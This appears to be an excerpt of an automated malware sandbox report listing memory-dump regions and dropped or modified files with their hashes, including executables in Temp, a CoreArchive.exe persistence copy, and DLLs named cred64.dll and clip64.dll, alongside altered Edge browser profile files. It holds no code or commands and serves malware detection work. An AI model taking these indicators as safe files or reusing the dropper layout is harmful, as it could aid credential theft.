memory/5636-319-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1108-317-0x0000000005660000-0x0000000005670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 b81b2eb3482efa33317c20415beaf6a4
SHA1 34711c1bad47eb6b94c242473de396eb9362543e
SHA256 61bf7b52d24d540150690db32dd12dbc9a11f8b7ac4bacfd1516df25c2b583dc
SHA512 e4f6e69851a7ce778c7e1f8f4904654e887ef505dfe1fe9bc26834f96b787f4573b9bf9d827328690ec274ca102a8a0ce6b098cd49d51214f43760ff7227464b

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/1108-323-0x0000000003020000-0x0000000003030000-memory.dmp

memory/1108-324-0x0000000003020000-0x0000000003030000-memory.dmp

memory/5636-332-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1108-331-0x0000000003020000-0x0000000003030000-memory.dmp

memory/1108-334-0x0000000005EB0000-0x0000000005FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp

MD5 e416b5593ef10377e8edc748ca6f2527
SHA1 d06fb79becff1bedd80f1b861449c8665af9aa67
SHA256 a7e400b62721851753ec6453e7eb3a5df4797149cfa1d3b0bf9db0a837863eb0
SHA512 8e44b491f86779ab5a6834da0639952be11d6ab598f392cee28ed5dabd71b3b15330d872620c1d0d858024e0e09d81ab0f9addbde82c1695de22d0bdf8f5be7c

memory/3740-330-0x00007FFFFF520000-0x00007FFFFFFE1000-memory.dmp

memory/1108-326-0x0000000003020000-0x0000000003030000-memory.dmp

memory/5840-339-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp

MD5 e416b5593ef10377e8edc748ca6f2527
SHA1 d06fb79becff1bedd80f1b861449c8665af9aa67
SHA256 a7e400b62721851753ec6453e7eb3a5df4797149cfa1d3b0bf9db0a837863eb0
SHA512 8e44b491f86779ab5a6834da0639952be11d6ab598f392cee28ed5dabd71b3b15330d872620c1d0d858024e0e09d81ab0f9addbde82c1695de22d0bdf8f5be7c

memory/1644-338-0x00000000733C0000-0x0000000073B70000-memory.dmp

memory/1108-341-0x0000000003020000-0x0000000003030000-memory.dmp

memory/1108-344-0x0000000005EB0000-0x0000000005FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5I9HH.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

memory/1108-364-0x00000000733C0000-0x0000000073B70000-memory.dmp

memory/5832-365-0x0000000000610000-0x0000000000611000-memory.dmp

memory/5984-369-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4364-372-0x00000000008D0000-0x00000000008D9000-memory.dmp

memory/6068-379-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/5984-377-0x0000000000400000-0x0000000000434000-memory.dmp

memory/4364-370-0x0000000000A70000-0x0000000000B70000-memory.dmp

memory/1644-368-0x00000000076C0000-0x00000000076D0000-memory.dmp

memory/5984-367-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5984-363-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1644-381-0x00000000089F0000-0x0000000008A66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 4d1f0d9bfac03f5237d800cd61ed1133
SHA1 a8d2884e093ac24d23d48c804f617a0115fe697c
SHA256 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18
SHA512 acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Lj998Dz.exe

MD5 2034573ee4fec5a6f977653d54b9376e
SHA1 75ea9485c6946298540fd7e9f7b83bb74fc49f0b
SHA256 389db89bde2b96b54bbaba005153bf4512c4e1e63fefa360dc757af26c958561
SHA512 76de72375be42485bb9a6a1a76a59059bbbeb33bf45797e64c254de3785f215a8d4620c8fd0da4a8ea12fe9e4d6129a5af18f2ebce3291317d1b2ed3a085623d

memory/6068-383-0x0000000000400000-0x0000000000409000-memory.dmp

memory/5840-362-0x0000000000400000-0x000000000041B000-memory.dmp

memory/6124-386-0x00000000733C0000-0x0000000073B70000-memory.dmp

memory/6124-385-0x0000000000D70000-0x0000000000DAE000-memory.dmp

memory/1108-361-0x0000000005EB0000-0x0000000005FB0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5I9HH.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

C:\Users\Admin\AppData\Local\Temp\is-5I9HH.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/5840-343-0x0000000000400000-0x000000000041B000-memory.dmp

memory/6124-388-0x0000000007A80000-0x0000000007A90000-memory.dmp

memory/1644-413-0x0000000008AB0000-0x0000000008ACE000-memory.dmp

memory/1040-414-0x00000000028B0000-0x0000000002CAF000-memory.dmp

C:\ProgramData\CoreArchive\CoreArchive.exe

MD5 46e6bb577ceb65806ef24e900abf04a0
SHA1 947f8ac53bbc779a51a48f5e7d9634720105b689
SHA256 b9763b0e13159d7ddedcd2ae757e9557a6f1d8081b2646ae4d9bebe845f9c451
SHA512 be03e8f7f4e2759022e0bbbf02c93fe4343f2f603c83b8e46e8387371de6a0d38221ea37b480f3e2135af3077e96f8c515b04d99aa4cd215e8db32c467513e4b

memory/4240-437-0x0000000000400000-0x0000000000636000-memory.dmp

memory/4240-440-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7b820bf35ead1603b44e8104f79531e2
SHA1 bceaf499a182959ca085ecc921c06565b1bf24ef
SHA256 2a9935ebfd17356eabc31282e827cbff1a0a7698bb525c3b57146f3a9d9072a4
SHA512 fa48818410c9769eb9edd0b181725f4f303066464bca5c099241f28940b7e63a1374cf862a31cc48e79f174237640ea5421014d62012813a6d19f79f22c0e46a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 da6c8a1e41148106a00a89a5bb238727
SHA1 6a8ff3294d1f378acd2dd8620ca9b6351e6cc6cb
SHA256 e4ca448ce9f43d705c6089dceae0854b331faf2dd4d0f576d6803016e4ebd529
SHA512 6cae6b09243519a25b7decabc021fb41a0c8808aa45c9241c4d6e02f88038b561de3daa55671f296dd1219c892a447a4bc023183d0a87d12c9e4e00c9496835d

memory/6068-465-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3232-464-0x0000000002E90000-0x0000000002EA6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 b72464531eda9c139d7fee6ceae9adf9
SHA1 6c5675d501cda6b8babb4940912ca733b17ee029
SHA256 e253d634c94a9799873b940cfbda6d8e34ff755b7f1e1d57001928fc6dfa69b8
SHA512 91e76ac3c76e4ef75ec64f4ab1921b9dc92ae3607f64b2835370af7613eee4a8079c2db2cf824110960620a4b490144db739ec4745bd9c5c649fece12dd183f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe590a85.TMP

MD5 9c8ec2f921d5bd42f708ba8182f7a3c6
SHA1 84d0ea6be233041fb712d00ccf616c847f5eb064
SHA256 ae7788f9a0bc9b63d1e5ae795274401ab8f96e262d91b3e9db5955e5c9aeffe3
SHA512 55f97a54090a0366ffec54ceb4ff466db4d5bf15479091f08101a8b0eb2c7190c30452a9d0d9f847dec93e49c473cb7e2cc691b36cb9588d873dff411c6c5703

memory/5832-480-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/1040-488-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5560-494-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d1429f96f1ff1204b4308c23639091b2
SHA1 37fb6501dc5730f3f17711e04ead78822656c3ee
SHA256 df60b49ca841421f12e0d6d5e2996264c9081ae1b15753e38afcbb4788b5d79c
SHA512 76714f3fcd06a5cd38f136fe4675add150fde8e457066b89ce5a5b3a37dda425a1a57e462e0f35cf7aaf23e14cf66f213d2fe8298797928bd130643f89732836

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_obigk44l.5fw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1040-574-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1752-597-0x00007FF69DBD0000-0x00007FF69E171000-memory.dmp

memory/5560-598-0x0000000000400000-0x0000000000636000-memory.dmp

memory/1752-625-0x00007FF69DBD0000-0x00007FF69E171000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/1040-678-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5792-680-0x00007FF73E110000-0x00007FF73E476000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1fc73ad88c9785885e8ad31970410530
SHA1 93b7411fb87350f88ada75a418a9920cc20f8474
SHA256 7d0c0f0aa1f7dfb077bd801d96a0c20c512c7930e55366426d7705e9df428314
SHA512 6406ccb9f6f69df1e074be4159a10bca9161f2e0c942493a08970cd69aa8d7045fe3b4a150ca65ecf94bbd11f39e93582b0724a79ce9e812210b577c93360250

memory/5560-705-0x0000000000400000-0x0000000000636000-memory.dmp

memory/5240-723-0x00007FF672DD0000-0x00007FF673371000-memory.dmp

memory/2264-731-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5792-770-0x00007FF73E110000-0x00007FF73E476000-memory.dmp

memory/5560-771-0x0000000000400000-0x0000000000636000-memory.dmp

memory/4252-789-0x0000000001300000-0x000000000133E000-memory.dmp

memory/5792-790-0x00007FF73E110000-0x00007FF73E476000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8019fc8342dc094aa41282bcd123608a
SHA1 27f281826f59236f197a2b0ddbb2bfdf6935834a
SHA256 fdb0443c2c98899fd17edc7c49d51c32c0c2f9cdff74ddb02a5a4f7a056d970e
SHA512 38a80f5c8133333ba925e12cc8d765c9605558eb33784d14be0179034b1813378026734eccd5a41b898fce77e9244fe899b4c54761986044d3cb0fbf020a6494

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ffa3ab3faa9a9fae197ffe5544385ebc
SHA1 1013c2dfe753e27336dcf4075e5acf9eaef6aa14
SHA256 be743bb55c8da8afb5f33a5548927676a4021ca2204824ec0392900fa4dfa025
SHA512 ece91a770d7b1b6a5c50d37d30f2b6c085ccaf050c03b8f528656df8d26c43ecde367806e9e7b41cb93ea03a6178a7127be5e2b07a5dfbc2a9ae500a0c9379e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 375f40e3d49f36af58d0b93428cbc6f1
SHA1 62dc9bdc78242ea43d84befafe1e612a43a67d25
SHA256 6bc5df748b6a2838c11ba9f17f5285c13165a1f1260bae7f3c7554d69d0d0e33
SHA512 b440617ce61e379aa6e9ae6ea5638a033f5c38a4c01b52d7350cae1c61dee1d4694b6acc1efc417c322692041bd7fe6334ee8eab9bc6293b53a3974bbe15ea47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 11eb18e44c2d2329b6a505f98ca56323
SHA1 59159fa1f86b42dbf8a2b034f246d2ddbf102b2a
SHA256 5f21029f3fa416416fc29b26d4b152b51dd042285df8fd3fa06b0ab356b9fa2c
SHA512 3f520dbaf020cb2c712bed311eca5a3da5980ccc4d48eae2f2edcc115a76d33e4e72fb481ead468cce16b44a078a981a11af2dfde55c3b3795e63eefab664c77